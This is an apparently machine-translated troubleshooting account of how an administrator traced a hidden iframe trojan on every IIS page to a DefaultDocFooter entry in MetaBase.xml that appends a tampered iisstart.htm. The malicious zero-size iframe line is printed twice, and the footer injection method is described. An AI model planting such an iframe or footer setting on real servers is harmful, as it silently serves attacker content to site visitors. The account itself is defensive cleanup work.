Check if an iframe Trojan is mounted to IIS on a Windows Server

On a server, almost all websites open webpages and even HTML webpages appear.

<Iframe src = "http: // xxxdfsfd/web.htm" height = 0 width = 0> </iframe>

Some of the Code in this style is in the header, and some of the anti-virus software at the end will report the virus.

How can I find this code in the source code when I open the HTML or ASP PHP page?

Cause Analysis

First, I suspect that ARP is infected with Trojans. No ARP spoofing is detected by arp defense tools.

In addition, arp spoofing generally does not insert code every time, but sometimes does not

You can also find this code when accessing http: // 127.0.0.1 or http: // localhost.

Possible exclusion of arp spoofing.

Then I thought it could be JavaScript tampering, or other contained files. After searching, I found that the modified page was not inserted into the newly created HTML page, then it can only be mounted through IIS.

Back up iis data and reinstall iis. The Code disappears and the backup iis is restored.

Look closely. The problem should be found in the IIS configuration file. Open the configuration file and no code is found.

It is likely that a file has been called. How can this problem be found? I suddenly remembered the famous Filemon.

Upload a local file to the server and open Filemon. There is too much data and some useless data is filtered out.

There are still a lot of data that only leaves iis processes. It seems that there are still many websites on the server.

Disable all sites and create a test site anky Directory: D: \ www \. Create a blank page test.htm

The code for accessing this page is inserted. Let's see how Filemon reads C: \ Inetpub \ wwwroot \ iisstart.htm.

Open C: \ Inetpub \ wwwroot \ iisstart.htm and watch it.

<Iframe src = "http: // xxxdfsfd/web.htm" height = 0 width = 0> </iframe>

Delete the code and leave it blank. Then test.htm is normal and C: \ Inetpub \ wwwroot \ iisstart.htm is deleted and then accessed.

Test.htm has the problem of "An error occurred while reading the data footer file". It seems that it is called.

This file.

Just clear C: \ Inetpub \ wwwroot \ iisstart.htm. In this case, remove the root to solve the problem.

Continue

Is it possible that it is caused by expansion? It is normal to check all of them in expansion.

Of course, Trojan Horse mounting through ISAPI also exists.

In the end, I think there is a problem with the configuration file.

Open the configuration file in % windir % \ system32 \ inetsrv \ MetaBase. xml.

Open it with a notebook and find iisstart.htm and find a line. I thought it was the default site. Then I thought it was wrong.

By default, all sites are deleted. Take a closer look at the Code as follows:

DefaultDocFooter = "FILE: C: \ Inetpub \ wwwroot \ iisstart.htm"

Delete this row, and the problem is completely solved.